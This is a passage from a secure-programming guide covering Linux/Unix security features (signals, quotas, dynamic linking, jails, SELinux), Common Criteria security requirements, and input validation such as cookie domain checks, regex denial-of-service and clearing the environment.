control message is a struct cmsghdr followed by data, and for this purpose you want the cmsg_type set to
SCM_RIGHTS. A file descriptor is retrieved through recvmsg(2) and then tracked down in the
analogous way. Frankly, this feature is quite baroque, but it’s worth knowing about.
Linux 2.2 and later supports an additional feature in Unix domain sockets: you can acquire the peer’s
“credentials” (the pid, uid, and gid). Here’s some sample code:
Standard Unix convention is that binding to TCP and UDP local port numbers less than 1024 requires
root privilege, while any process can bind to an unbound port number of 1024 or greater. Linux follows
this convention, more specifically, Linux requires a process to have the capability
CAP_NET_BIND_SERVICE to bind to a port number less than 1024; this capability is normally only
held by processes with an EUID of 0. The adventurous can check this in Linux by examining its Linux’s
source; in Linux 2.2.12, it’s file /usr/src/linux/net/ipv4/af_inet.c, function inet_bind().
3.5. Signals
Signals are a simple form of “interruption” in the Unix-like OS world, and are an ancient part of Unix. A
process can set a “signal” on another process (say using kill(1) or kill(2)), and that other process would
receive and handle the signal asynchronously. For a process to have permission to send an arbitrary
signal to some other process, the sending process must either have root privileges, or the real or effective
user ID of the sending process must equal the real or saved set-user-ID of the receiving process.
31
Chapter 3. Summary of Linux and Unix Security Features
However, some signals can be sent in other ways. In particular, SIGURG can be delivered over a network
through the TCP/IP out-of-band (OOB) message.
Although signals are an ancient part of Unix, they’ve had different semantics in different
implementations. Basically, they involve questions such as “what happens when a signal occurs while
handling another signal”? The older Linux libc 5 used a different set of semantics for some signal
operations than the newer GNU libc libraries. Calling C library functions is often unsafe within a signal
handler, and even some system calls aren’t safe; you need to examine the documentation for each call
you make to see if it promises to be safe to call inside a signal. For more information, see the glibc FAQ
(on some systems a local copy is available at /usr/doc/glibc-*/FAQ).
For new programs, just use the POSIX signal system (which in turn was based on BSD work); this set is
widely supported and doesn’t have some of the problems that some of the older signal systems did. The
POSIX signal system is based on using the sigset_t datatype, which can be manipulated through a set of
operations: sigemptyset(), sigfillset(), sigaddset(), sigdelset(), and sigismember(). You can read about
these in sigsetops(3). Then use sigaction(2), sigprocmask(2), sigpending(2), and sigsuspend(2) to set up
an manipulate signal handling (see their man pages for more information).
In general, make any signal handlers very short and simple, and look carefully for race conditions.
Signals, since they are by nature asynchronous, can easily cause race conditions.
A common convention exists for servers: if you receive SIGHUP, you should close any log files, reopen
and reread configuration files, and then re-open the log files. This supports reconfiguration without
halting the server and log rotation without data loss. If you are writing a server where this convention
makes sense, please support it.
Michal Zalewski [2001] has written an excellent tutorial on how signal handlers are exploited, and has
recommendations for how to eliminate signal race problems. I encourage looking at his summary for
more information; here are my recommendations, which are similar to Michal’s work:
• Where possible, have your signal handlers unconditionally set a specific flag and do nothing else.
• If you must have more complex signal handlers, use only calls specifically designated as being safe for
use in signal handlers. In particular, don’t use malloc() or free() in C (which on most systems aren’t
protected against signals), nor the many functions that depend on them (such as the printf() family and
syslog()). You could try to “wrap” calls to insecure library calls with a check to a global flag (to avoid
re-entry), but I wouldn’t recommend it.
• Block signal delivery during all non-atomic operations in the program, and block signal delivery
inside signal handlers.
32
Chapter 3. Summary of Linux and Unix Security Features
You can define storage (filesystem) quota limits on each mountpoint for the number of blocks of storage
and/or the number of unique files (inodes) that can be used, and you can set such limits for a given user
or a given group. A “hard” quota limit is a never-to-exceed limit, while a “soft” quota can be temporarily
exceeded. See quota(1), quotactl(2), and quotaon(8).
The rlimit mechanism supports a large number of process quotas, such as file size, number of child
processes, number of open files, and so on. There is a “soft” limit (also called the current limit) and a
“hard limit” (also called the upper limit). The soft limit cannot be exceeded at any time, but through calls
it can be raised up to the value of the hard limit. See getrlimit(2), setrlimit(2), and getrusage(2),
sysconf(3), and ulimit(1). Note that there are several ways to set these limits, including the PAM module
pam_limits.
33
Chapter 3. Summary of Linux and Unix Security Features
Various environment variables can control this process, and in fact there are environment variables that
permit you to override this process (so, for example, you can temporarily substitute a different library for
this particular execution). In Linux, the environment variable LD_LIBRARY_PATH is a colon-separated
set of directories where libraries are searched for first, before the standard set of directories; this is useful
when debugging a new library or using a nonstandard library for special purposes, but be sure you trust
those who can control those directories. The variable LD_PRELOAD lists object files with functions that
override the standard set, just as /etc/ld.so.preload does. The variable LD_DEBUG, displays debugging
information; if set to “all”, voluminous information about the dynamic linking process is displayed while
it’s occurring.
Permitting user control over dynamically linked libraries would be disastrous for setuid/setgid programs
if special measures weren’t taken. Therefore, in the GNU glibc implementation, if the program is setuid
or setgid these variables (and other similar variables) are ignored or greatly limited in what they can do.
The GNU glibc library determines if a program is setuid or setgid by checking the program’s credentials;
if the UID and EUID differ, or the GID and the EGID differ, the library presumes the program is
setuid/setgid (or descended from one) and therefore greatly limits its abilities to control linking. If you
load the GNU glibc libraries, you can see this; see especially the files elf/rtld.c and
sysdeps/generic/dl-sysdep.c. This means that if you cause the UID and GID to equal the EUID and
EGID, and then call a program, these variables will have full effect. Other Unix-like systems handle the
situation differently but for the same reason: a setuid/setgid program should not be unduly affected by
the environment variables set. Note that graphical user interface toolkits generally do permit user control
over dynamically linked libraries, because executables that directly invoke graphical user inteface
toolkits should never, ever, be setuid (or have other special privileges) at all. For more about how to
develop secure GUI applications, see Section 7.4.4.
For Linux systems, you can get more information from my document, the Program Library HOWTO.
3.8. Audit
Different Unix-like systems handle auditing differently. In Linux, the most common “audit” mechanism
is syslogd(8), usually working in conjunction with klogd(8). You might also want to look at wtmp(5),
utmp(5), lastlog(8), and acct(2). Some server programs (such as the Apache web server) also have their
own audit trail mechanisms. According to the FHS, audit logs should be stored in /var/log or its
subdirectories.
3.9. PAM
Sun Solaris and nearly all Linux systems use the Pluggable Authentication Modules (PAM) system for
authentication. PAM permits run-time configuration of authentication methods (e.g., use of passwords,
smart cards, etc.). See Section 11.6 for more information on using PAM.
34
Chapter 3. Summary of Linux and Unix Security Features
Systems
A vast amount of research and development has gone into extending Unix-like systems to support
security needs of various communities. For example, several Unix-like systems have been extended to
support the U.S. military’s desire for multilevel security. If you’re developing software, you should try to
design your software so that it can work within these extensions.
FreeBSD has a new system call, jail(2). The jail system call supports sub-partitioning an environment
into many virtual machines (in a sense, a “super-chroot”); its most popular use has been to provide
virtual machine services for Internet Service Provider environments. Inside a jail, all processes (even
those owned by root) have the the scope of their requests limited to the jail. When a FreeBSD system is
booted up after a fresh install, no processes will be in jail. When a process is placed in a jail, it, and any
descendants of that process created will be in that jail. Once in a jail, access to the file name-space is
restricted in the style of chroot(2) (with typical chroot escape routes blocked), the ability to bind network
resources is limited to a specific IP address, the ability to manipulate system resources and perform
privileged operations is sharply curtailed, and the ability to interact with other processes is limited to
only processes inside the same jail. Note that each jail is bound to a single IP address; processes within
the jail may not make use of any other IP address for outgoing or incoming connections. More
information is available in the OnLamp.com article on FreeBSD Jails.
Some extensions available in Linux, such as POSIX capabilities and special mount-time options, have
already been discussed. Here are a few of these efforts for Linux systems for creating restricted execution
environments; there are many different approaches. Linux 2.6 adds the "Linux Security Module" (LSM)
interface, which allows administrators to plug in modules to perform more sophisticated access control
systems. The U.S. National Security Agency (NSA) has developed Security-Enhanced Linux (Flask)
(SELinux), which supports defining a security policy in a specialized language and then enforces that
policy. Originally SELinux was developed as a separate set of patches, but it now works using LSM and
NSA has submitted the SELinux kernel module to the Linux developers for inclusion in the normal
kernel. The Medusa DS9 extends Linux by supporting, at the kernel level, a user-space authorization
server. LIDS protects files and processes, allowing administrators to “lock down” their system. The
“Rule Set Based Access Control” system, RSBAC is based on the Generalized Framework for Access
Control (GFAC) by Abrams and LaPadula and provides a flexible system of access control based on
several kernel modules. Subterfugue is a framework for “observing and playing with the reality of
software”; it can intercept system calls and change their parameters and/or change their return values to
implement sandboxes, tracers, and so on; it runs under Linux 2.4 with no changes (it doesn’t require any
kernel modifications). Janus is a security tool for sandboxing untrusted applications within a restricted
execution environment. Some have even used User-mode Linux, which implements “Linux on Linux”, as
a sandbox implementation. Because there are so many different approaches to implementing more
sophisticated security models, Linus Torvalds has requested that a generic approach be developed so
different security policies can be inserted; for more information about this, see
http://mail.wirex.com/mailman/listinfo/linux-security-module.
There are many other extensions for security on various Unix-like systems, but these are really outside
the scope of this document.
35
Chapter 4. Security Requirements
You will know that your tent is secure;
you will take stock of your property and
find nothing missing.
Job 5:24 (NIV)
Before you can determine if a program is secure, you need to determine exactly what its security
requirements are. Obviously, your specific requirements depend on the kind of system and data you
manage.
For example, any person or company doing business in the state of California is responsible for notifying
California residents when an unauthorized person acquires unencrypted computer data if that data
includes first name, last name, and at least one of the following: Social Security Number, driver’s license
number, account number, debit or credit card information. (Senate bill 1386 aka Civil Code 1798.82,
effective July 1, 2003).
Thankfully, there’s an international standard for identifying and defining security requirements that is
useful for many such circumstances: the Common Criteria [CC 1999], standardized as ISO/IEC
15408:1999. The CC is the culmination of decades of work to identify information technology security
requirements. There are other schemes for defining security requirements and evaluating products to see
if products meet the requirements, such as NIST FIPS-140 for cryptographic equipment, but these other
schemes are generally focused on a specialized area and won’t be considered further here.
This chapter briefly describes the Common Criteria (CC) and how to use its concepts to help you
informally identify security requirements and talk with others about security requirements using standard
terminology. The language of the CC is more precise, but it’s also more formal and harder to understand;
hopefully the text in this section will help you “get the jist”.
Note that, in some circumstances, software cannot be used unless it has undergone a CC evaluation by an
accredited laboratory. This includes certain kinds of uses in the U.S. Department of Defense (as specified
by NSTISSP Number 11, which requires that before some products can be used they must be evaluated
or enter evaluation), and in the future such a requirement may also include some kinds of uses for
software in the U.S. federal government. This section doesn’t provide enough information if you plan to
actually go through a CC evaluation by an accredited laboratory. If you plan to go through a formal
evaluation, you need to read the real CC, examine various websites to really understand the basics of the
CC, and eventually contract a lab accredited to do a CC evaluation.
36
Chapter 4. Security Requirements
Although the CC is International Standard ISO/IEC 15408:1999, it is outrageously expensive to order the
CC from ISO. Hopefully someday ISO will follow the lead of other standards organizations such as the
IETF and the W3C, which freely redistribute standards. Not surprisingly, IETF and W3C standards are
followed more often than many ISO standards, in part because ISO’s fees for standards simply make
them inaccessible to most developers. (I don’t mind authors being paid for their work, but ISO doesn’t
fund most of the standards development work - indeed, many of the developers of ISO documents are
volunteers - so ISO’s indefensible fees only line their own pockets and don’t actually aid the authors or
users at all.) Thankfully, the CC developers anticipated this problem and have made sure that the CC’s
technical content is freely available to all; you can download the CC’s technical content from
http://csrc.nist.gov/cc/ccv20/ccv2list.htm Even those doing formal evaluation processes usually use these
editions of the CC, and not the ISO versions; there’s simply no good reason to pay ISO for them.
Although it can be used in other ways, the CC is typically used to create two kinds of documents, a
“Protection Profile” (PP) or a “Security Target” (ST). A “protection profile” (PP) is a document created
by group of users (for example, a consumer group or large organization) that identifies the desired
security properties of a product. Basically, a PP is a list of user security requirements, described in a very
specific way defined by the CC. If you’re building a product similar to other existing products, it’s quite
possible that there are one or more PPs that define what some users believe are necessary for that kind of
product (e.g., an operating system or firewall). A “security target” (ST) is a document that identifies what
a product actually does, or a subset of it, that is security-relevant. An ST doesn’t need to meet the
requirements of any particular PP, but an ST could meet the requirements of one or more PPs.
Both PPs and STs can go through a formal evaluation. An evaluation of a PP simply ensures that the PP
meets various documentation rules and sanity checks. An ST evaluation involves not just examining the
ST document, but more importantly it involves evaluating an actual system (called the “target of
evaluation”, or TOE). The purpose of an ST evaluation is to ensure that, to the level of the assurance
requirements specified by the ST, the actual product (the TOE) meets the ST’s security functional
requirements. Customers can then compare evaluated STs to PPs describing what they want. Through
this comparison, consumers can determine if the products meet their requirements - and if not, where the
limitations are.
To create a PP or ST, you go through a process of identifying the security environment, namely, your
assumptions, threats, and relevant organizational security policies (if any). From the security
environment, you derive the security objectives for the product or product type. Finally, the security
requirements are selected so that they meet the objectives. There are two kinds of security requirements:
functional requirements (what a product has to be able to do), and assurance requirements (measures to
inspire confidence that the objectives have been met). Actually creating a PP or ST is often not a simple
straight line as outlined here, but the final result needs to show a clear relationship so that no critical
point is easily overlooked. Even if you don’t plan to write an ST or PP, the ideas in the CC can still be
helpful; the process of identifying the security environment, objectives, and requirements is still helpful
in identifying what’s really important.
The vast majority of the CC’s text is used to define standardized functional requirements and assurance
requirements. In essence, the majority of the CC is a “chinese menu” of possible security requirements
that someone might want. PP authors pick from the various options to describe what they want, and ST
authors pick from the options to describe what they provide.
Since many people might have difficulty identifying a reasonable set of assurance requirements, so
pre-created sets of assurance requirements called “evaluation assurance levels” (EALs) have been
defined, ranging from 1 to 7. EAL 2 is simply a standard shorthand for the set of assurance requirements
defined for EAL 2. Products can add additional assurance measures, for example, they might choose
37
Chapter 4. Security Requirements
EAL 2 plus some additional assurance measures (if the combination isn’t enough to achieve a higher
EAL level, such a combination would be called "EAL 2 plus"). There are mutual recognition agreements
signed between many of the world’s nations that will accept an evaluation done by an accredited
laboratory in the other countries as long as all of the assurance measures taken were at the EAL 4 level or
less.
If you want to actually write an ST or PP, there’s an open source software program that can help you,
called the “CC Toolbox”. It can make sure that dependencies between requirements are met, suggest
common requirements, and help you quickly develop a document, but it obviously can’t do your thinking
for you. The specification of exactly what information must be in a PP or ST are in CC part 1, annexes B
and C respectively.
If you do decide to have your product (or PP) evaluated by an accredited laboratory, be prepared to spend
money, spend time, and work throughout the process. In particular, evaluations require paying an
accredited lab to do the evaluation, and higher levels of assurance become rapidly more expensive.
Simply believing your product is secure isn’t good enough; evaluators will require evidence to justify
any claims made. Thus, evaluations require documentation, and usually the available documentation has
to be improved or developed to meet CC requirements (especially at the higher assurance levels). Every
claim has to be justified to some level of confidence, so the more claims made, the stronger the claims,
and the more complicated the design, the more expensive an evaluation is. Obviously, when flaws are
found, they will usually need to be fixed. Note that a laboratory is paid to evaluate a product and
determine the truth. If the product doesn’t meet its claims, then you basically have two choices: fix the
product, or change (reduce) the claims.
It’s important to discuss with customers what’s desired before beginning a formal ST evaluation; an ST
that includes functional or assurance requirements not truly needed by customers will be unnecessarily
expensive to evaluate, and an ST that omits necessary requirements may not be acceptable to the
customers (because that necessary piece won’t have been evaluated). PPs identify such requirements, but
make sure that the PP accurately reflects the customer’s real requirements (perhaps the customer only
wants a part of the functionality or assurance in the PP, or has a different environment in mind, or wants
something else instead for the situations where your product will be used). Note that an ST need not
include every security feature in a product; an ST only states what will be (or has been) evaluated. A
product that has a higher EAL rating is not necessarily more secure than a similar product with a lower
rating or no rating; the environment might be different, the evaluation may have saved money and time
by not evaluating the other product at a higher level, or perhaps the evaluation missed something
important. Evaluations are not proofs; they simply impose a defined minimum bar to gain confidence in
the requirements or product.
38
Chapter 4. Security Requirements
threat agent (who might perform the attack?), a presumed attack method, any vulnerabilities that are the
basis for the attack, and what asset is under attack.
You’d then define a set of security objectives for the system and environment, and show that those
objectives counter the threats and satisfy the policies. Even if you aren’t creating a PP or ST, thinking
about your assumptions, threats, and possible policies can help you avoid foolish decisions. For example,
if the computer network you’re using can be sniffed (e.g., the Internet), then unencrypted passwords are a
foolish idea in most circumstances.
For the CC, you’d then identify the functional and assurance requirements that would be met by the
TOE, and which ones would be met by the environment, to meet those security objectives. These
requirements would be selected from the “chinese menu” of the CC’s possible requirements, and the next
sections will briefly describe the major classes of requirements. In the CC, requirements are grouped into
classes, which are subdivided into families, which are further subdivided into components; the details of
all this are in the CC itself if you need to know about this. A good diagram showing how this works is in
the CC part 1, figure 4.5, which I cannot reproduce here.
Again, if you’re not intending for your product to undergo a CC evaluation, it’s still good to briefly
determine this kind of information and informally write include that information in your documentation
(e.g., the man page or whatever your documentation is).
• Security Audit (FAU). Perhaps you’ll need to recognize, record, store, and analyze security-relevant
activities. You’ll need to identify what you want to make auditable, since often you can’t leave all
possible auditing capabilities enabled. Also, consider what to do when there’s no room left for auditing
- if you stop the system, an attacker may intentionally do things to be logged and thus stop the system.
• Communication/Non-repudiation (FCO). This class is poorly named in the CC; officially it’s called
communication, but the real meaning is non-repudiation. Is it important that an originator cannot deny
having sent a message, or that a recipient cannot deny having received it? There are limits to how well
technology itself can support non-repudiation (e.g., a user might be able to give their private key away
ahead of time if they wanted to be able to repudiate something later), but nevertheless for some
applications supporting non-repudiation capabilities is very useful.
• Cryptographic Support (FCS). If you’re using cryptography, what operations use cryptography, what
algorithms and key sizes are you using, and how are you managing their keys (including distribution
and destruction)?
• User Data Protection (FDP). This class specifies requirement for protecting user data, and is a big
class in the CC with many families inside it. The basic idea is that you should specify a policy for data
(access control or information flow rules), develop various means to implement the policy, possibly
support off-line storage, import, and export, and provide integrity when transferring user data between
39
Chapter 4. Security Requirements
TOEs. One often-forgotten issue is residual information protection - is it acceptable if an attacker can
later recover “deleted” data?
• Identification and authentication (FIA). Generally you don’t just want a user to report who they are
(identification) - you need to verify their identity, a process called authentication. Passwords are the
most common mechanism for authentication. It’s often useful to limit the number of authentication
attempts (if you can) and limit the feedback during authentication (e.g., displaying asterisks instead of
the actual password). Certainly, limit what a user can do before authenticating; in many cases, don’t let
the user do anything without authenticating. There may be many issues controlling when a session can
start, but in the CC world this is handled by the "TOE access" (FTA) class described below instead.
• Security Management (FMT). Many systems will require some sort of management (e.g., to control
who can do what), generally by those who are given a more trusted role (e.g., administrator). Be sure
you think through what those special operations are, and ensure that only those with the trusted roles
can invoke them. You want to limit trust; ideally, even more trusted roles should be limited in what
they can do.
• Privacy (FPR). Do you need to support anonymity, pseudonymity, unlinkability, or unobservability? If
so, are there conditions where you want or don’t want these (e.g., should an administrator be able to
determine the real identity of someone hiding behind a pseudonym?). Note that these can seriously
conflict with non-repudiation, if you want those too. If you’re worried about sophisticated threats,
these functions can be hard to provide.
• Protection of the TOE Security Functions/Self-protection (FPT). Clearly, if the TOE can be subverted,
any security functions it provides aren’t worthwhile, and in many cases a TOE has to provide at least
some self-protection. Perhaps you should "test the underlying abstract machine" - i.e., test that the
underlying components meet your assumptions, or have the product run self-tests (say during start-up,
periodically, or on request). You should probably "fail secure", at least under certain conditions;
determine what those conditions are. Consider phyical protection of the TOE. You may want some
sort of secure recovery function after a failure. It’s often useful to have replay detection (detect when
an attacker is trying to replay older actions) and counter it. Usually a TOE must make sure that any
access checks are always invoked and actually succeed before performing a restricted action.
• Resource Utilization (FRU). Perhaps you need to provide fault tolerance, a priority of service scheme,
or support resource allocation (such as a quota system).
• TOE Access (FTA). There may be many issues controlling sessions. Perhaps there should be a limit on
the number of concurrent sessions (if you’re running a web service, would it make sense for the same
user to be logged in simultaneously, or from two different machines?). Perhaps you should lock or
terminate a session automatically (e.g., after a timeout), or let users initiate a session lock. You might
want to include a standard warning banner. One surprisingly useful piece of information is displaying,
on login, information about the last session (e.g., the date/time and location of the last login) and the
date/time of the last unsuccessful attempt - this gives users information that can help them detect
interlopers. Perhaps sessions can only be established based on other criteria (e.g., perhaps you can
only use the program during business hours).
• Trusted path/channels (FTP). A common trick used by attackers is to make the screen appear to be
something it isn’t, e.g., run an ordinary program that looks like a login screen or a forged web site.
Thus, perhaps there needs to be a "trusted path" - a way that users can ensure that they are talking to
the "real" program.
40
Chapter 4. Security Requirements
• Configuration management (ACM). At least, have unique a version identifier for each TOE release, so
that users will know what they have. You gain more assurance if you have good automated tools to
control your software, and have separate version identifiers for each piece (typical CM tools like CVS
can do this, although CVS doesn’t record changes as atomic changes which is a weakness of it). The
more that’s under configuration management, the better; don’t just control your code, but also control
documentation, track all problem reports (especially security-related ones), and all development tools.
• Delivery and operation (ADO). Your delivery mechanism should ideally let users detect unauthorized
modifications to prevent someone else masquerading as the developer, and even better, prevent
modification in the first place. You should provide documentation on how to securely install, generate,
and start-up the TOE, possibly generating a log describing how the TOE was generated.
• Development (ADV). These CC requirements deal with documentation describing the TOE
implementation, and that they need to be consistent between each other (e.g., the information in the
ST, functional specification, high-level design, low-level design, and code, as well as any models of
the security policy).
• Guidance documents (AGD). Users and administrators of your product will probably need some sort
of guidance to help them use it correctly. It doesn’t need to be on paper; on-line help and "wizards"
can help too. The guidance should include warnings about actions that may be a problem in a secure
environemnt, and describe how to use the system securely.
• Life-cycle support (ALC). This includes development security (securing the systems being used for
development, including physical security), a flaw remediation process (to track and correct all security
flaws), and selecting development tools wisely.
• Tests (ATE). Simply testing can help, but remember that you need to test the security functions and not
just general functions. You should check if something is set to permit, it’s permitted, and if it’s
forbidden, it is no longer permitted. Of course, there may be clever ways to subvert this, which is what
vulnerability assessment is all about (described next).
• Vulnerability Assessment (AVA). Doing a vulnerability analysis is useful, where someone pretends to
be an attacker and tries to find vulnerabilities in the product using the available information, including
documentation (look for "don’t do X" statements and see if an attacker could exploit them) and
publicly known past vulnerabilities of this or similar products. This book describes various ways of
countering known vulnerabilities of previous products to problems such as replay attacks (where
known-good information is stored and retransmitted), buffer overflow attacks, race conditions, and
other issues that the rest of this book describes. The user and administrator guidance documents
should be examined to ensure that misleading, unreasonable, or conflicting guidance is removed, and
that secrity procedures for all modes of operation have been addressed. Specialized systems may need
to worry about covert channels; read the CC if you wish to learn more about covert channels.
41
Chapter 4. Security Requirements
• Maintenance of assurance (AMA). If you’re not going through a CC evaluation, you don’t need a
formal AMA process, but all software undergoes change. What is your process to give all your users
strong confidence that future changes to your software will not create new vulnerabilities? For
example, you could establish a process where multiple people review any proposed changes.
42
Chapter 5. Validate All Input
Wisdom will save you from the ways of
wicked men, from men whose words are
perverse...
Proverbs 2:12 (NIV)
Some inputs are from untrustable users, so those inputs must be validated (filtered) before being used.
We will first discuss the basics of input validation. This is followed by subsections that discuss different
kinds of inputs to a program; note that input includes process state such as environment variables, umask
values, and so on. Not all inputs are under the control of an untrusted user, so you need only worry about
those inputs that are.
43
Chapter 5. Validate All Input
• For strings, identify the legal characters or legal patterns (e.g., as a regular expression) and reject
anything not matching that form. There are special problems when strings contain control characters
(especially linefeed or NIL) or metacharacters (especially shell metacharacters); it is often best to
“escape” such metacharacters immediately when the input is received so that such characters are not
accidentally sent. CERT goes further and recommends escaping all characters that aren’t in a list of
characters not needing escaping [CERT 1998, CMU 1998]. See Section 8.3 for more information on
metacharacters. Note that line ending encodings vary on different computers: Unix-based systems use
character 0x0a (linefeed), CP/M and DOS based systems (including Windows) use 0x0d 0x0a
(carriage-return linefeed, and some programs incorrectly reverse the order), the Apple MacOS uses
0x0d (carriage return), and IBM OS/390 uses 0x85 (0x85) (next line, sometimes called newline).
• Limit all numbers to the minimum (often zero) and maximum allowed values.
• A full email address checker is actually quite complicated, because there are legacy formats that
greatly complicate validation if you need to support all of them; see mailaddr(7) and IETF RFC 822
[RFC 822] for more information if such checking is necessary. Friedl [1997] developed a regular
expression to check if an email address is valid (according to the specification); his “short” regular
expression is 4,724 characters, and his “optimized” expression (in appendix B) is 6,598 characters
long. And even that regular expression isn’t perfect; it can’t recognize local email addresses, and it
can’t handle nested parentheses in comments (as the specification permits). Often you can simplify
and only permit the “common” Internet address formats.
• Filenames should be checked; see Section 5.6 for more information on filenames.
• URIs (including URLs) should be checked for validity. If you are directly acting on a URI (i.e., you’re
implementing a web server or web-server-like program and the URL is a request for your data), make
sure the URI is valid, and be especially careful of URIs that try to “escape” the document root (the
area of the filesystem that the server is responding to). The most common ways to escape the
document root are via “..” or a symbolic link, so most servers check any “..” directories themselves
and ignore symbolic links unless specially directed. Also remember to decode any encoding first (via
URL encoding or UTF-8 encoding), or an encoded “..” could slip through. URIs aren’t supposed to
even include UTF-8 encoding, so the safest thing is to reject any URIs that include characters with
high bits set.
If you are implementing a system that uses the URI/URL as data, you’re not home-free at all; you
need to ensure that malicious users can’t insert URIs that will harm other users. See Section 5.13.4 for
more information about this.
• When accepting cookie values, make sure to check the the domain value for any cookie you’re using is
the expected one. Otherwise, a (possibly cracked) related site might be able to insert spoofed cookies.
Here’s an example from IETF RFC 2965 of how failing to do this check could cause a problem:
• User agent makes request to victim.cracker.edu, gets back cookie session_id="1234" and sets the
default domain victim.cracker.edu.
• User agent makes request to spoof.cracker.edu, gets back cookie session-id="1111", with
Domain=".cracker.edu".
• User agent makes request to victim.cracker.edu again, and passes:
Cookie: $Version="1"; session_id="1234",
$Version="1"; session_id="1111"; $Domain=".cracker.edu"
The server at victim.cracker.edu should detect that the second cookie was not one it originated by
noticing that the Domain attribute is not for itself and ignore it.
44
Chapter 5. Validate All Input
Unless you account for them, the legal character patterns must not include characters or character
sequences that have special meaning to either the program internals or the eventual output:
• A character sequence may have special meaning to the program’s internal storage format. For
example, if you store data (internally or externally) in delimited strings, make sure that the delimiters
are not permitted data values. A number of programs store data in comma (,) or colon (:) delimited text
files; inserting the delimiters in the input can be a problem unless the program accounts for it (i.e., by
preventing it or encoding it in some way). Other characters often causing these problems include
single and double quotes (used for surrounding strings) and the less-than sign "<" (used in SGML,
XML, and HTML to indicate a tag’s beginning; this is important if you store data in these formats).
Most data formats have an escape sequence to handle these cases; use it, or filter such data on input.
• A character sequence may have special meaning if sent back out to a user. A common example of this
is permitting HTML tags in data input that will later be posted to other readers (e.g., in a guestbook or
“reader comment” area). However, the problem is much more general. See Section 7.16 for a general
discussion on the topic, and see Section 5.13 for a specific discussion about filtering HTML.
These tests should usually be centralized in one place so that the validity tests can be easily examined for
correctness later.
Make sure that your validity test is actually correct; this is particularly a problem when checking input
that will be used by another program (such as a filename, email address, or URL). Often these tests have
subtle errors, producing the so-called “deputy problem” (where the checking program makes different
assumptions than the program that actually uses the data). If there’s a relevant standard, look at it, but
also search to see if the program has extensions that you need to know about.
While parsing user input, it’s a good idea to temporarily drop all privileges, or even create separate
processes (with the parser having permanently dropped privileges, and the other process performing
security checks against the parser requests). This is especially true if the parsing task is complex (e.g., if
you use a lex-like or yacc-like tool), or if the programming language doesn’t protect against buffer
overflows (e.g., C and C++). See Section 7.4 for more information on minimizing privileges.
When using data for security decisions (e.g., “let this user in”), be sure to use trustworthy channels. For
example, on a public Internet, don’t just use the machine IP address or port number as the sole way to
authenticate users, because in most environments this information can be set by the (potentially
malicious) user. See Section 7.12 for more information.
45
Chapter 5. Validate All Input
expression libraries are built-in or easily available in almost all language (the POSIX specification even
requires one).
46
Chapter 5. Validate All Input
Fundamentally, many modern regex engines (including those in PCRE, perl, Java, etc.) use backtracking
to implement regexes. In these implementations, if there is more than one potential solution for a match,
if will first try one branch to try to find a match, and if it doesn’t match, it will repeatedly backtrack to
the last untried solution and try again until all options are exhausted. The problem is that an attacker may
be able to cause many backtracks. In general, you want to bound the number of backtracks that occur.
The primary risks are groups with repetition, pariticularly if they are inside more repetition or alternation
with overlapping patterns. The regex "^([a-zA-Z]+)*$" with data "aaa1" involves a large number of
backtracks; once the engine encounters the "1", many implementations will backtrack through all
possible combinations of "+" and "*" before it can determine there is no match.
Simply avoiding the use of regexes doesn’t reliably counter reDOS attacks, because naively
implementing the regex processing causes exactly the same problem. There are, however, simple things
that can be done. First, avoid running regexes provided by an attacker (or limit the time they can run). If
you can, use a Thompson NFA-to-DFA implementation; these never backtrack and thus are immune to
the problem (though they can’t provide some useful functions like backreferences). Otherwise, review
regexes to prevent backtracking if you can. At any point, any given character should cause only one
branch to be taken in regex (just imagine that the regex is code). For every repetition, you should be able
to uniquely determine if the code will repeat or not based on the single next input character. You should
especially examine any repetition in a repetition - if possible, eliminate them (these in particular cause a
combinatorial explosion). You can use regex fuzzers and static analysis tools to examine these. In
addition, you can limit the input data size first before before using a regex; this greatly limits the effects
of exponential growth in time. You can find more information in [Crosby2003] and the OWASP’s
"Regular Expression Denial of Service"
47
Chapter 5. Validate All Input
48
Chapter 5. Validate All Input
necessary environment variables to safe values. There really isn’t a better way if you make any calls to
subordinate programs; there’s no practical method of listing “all the dangerous values”. Even if you
reviewed the source code of every program you call directly or indirectly, someone may add new
undocumented environment variables after you write your code, and one of them may be exploitable.
The simple way to erase the environment in C/C++ is by setting the global variable environ to NULL.
The global variable environ is defined in <unistd.h>; C/C++ users will want to #include this header file.
You will need to manipulate this value before spawning threads, but that’s rarely a problem, since you
want to do these manipulations very early in the program’s execution (usually before threads are
spawned).
The global variable environ’s definition is defined in various standards; it’s not clear that the official
standards condone directly changing its value, but I’m unaware of any Unix-like system that has trouble
with doing this. I normally just modify the “environ” directly; manipulating such low-level components
is possibly non-portable, but it assures you that you get a clean (and safe) environment. In the rare case
where you need later access to the entire set of variables, you could save the “environ” variable’s value
somewhere, but this is rarely necessary; nearly all programs need only a few values, and the rest can be
dropped.
Another way to clear the environment is to use the undocumented clearenv() function. The function
clearenv() has an odd history; it was supposed to be defined in POSIX.1, but somehow never made it into
that standard. However, clearenv() is defined in POSIX.9 (the Fortran 77 bindings to POSIX), so there is
a quasi-official status for it. In Linux, clearenv() is defined in <stdlib.h>, but before using #include to
include it you must make sure that __USE_MISC is #defined. A somewhat more “official” approach is to
cause __USE_MISC to be defined is to first #define either _SVID_SOURCE or _BSD_SOURCE, and
then #include <features.h> - these are the official feature test macros.
One environment value you’ll almost certainly re-add is PATH, the list of directories to search for
programs; PATH should not include the current directory and usually be something simple like
“/bin:/usr/bin”. Typically you’ll also set IFS (to its default of “ \t\n”, where space is the first character)
and TZ (timezone). Linux won’t die if you don’t supply either IFS or TZ, but some System V based
systems have problems if you don’t supply a TZ value, and it’s rumored that some shells need the IFS
value set. In Linux, see environ(5) for a list of common environment variables that you might want to set.
If you really need user-supplied values, check the values first (to ensure that the values match a pattern
for legal values and that they are within some reasonable maximum length). Ideally there would be some
standard trusted file in /etc with the information for “standard safe environment variable values”, but at
this time there’s no standard file defined for this purpose. For something similar, you might want to
examine the PAM module pam_env on those systems which have that module. If you allow users to set
an arbitrary environment variable, then you’ll let them subvert restricted shells (more on that below).
If you’re using a shell as your programming language, you can use the “/usr/bin/env” program with the
“-” option (which erases all environment variables of the program being run). Basically, you call
/usr/bin/env, give it the “-” option, follow that with the set of variables and their values you wish to set
(as name=value), and then follow that with the name of the program to run and its arguments. You
usually want to call the program using the full pathname (/usr/bin/env) and not just as “env”, in case a
user has created a dangerous PATH value. Note that GNU’s env also accepts the options "-i" and
"--ignore-environment" as synonyms (they also erase the environment of the program being started), but
these aren’t portable to other versions of env.
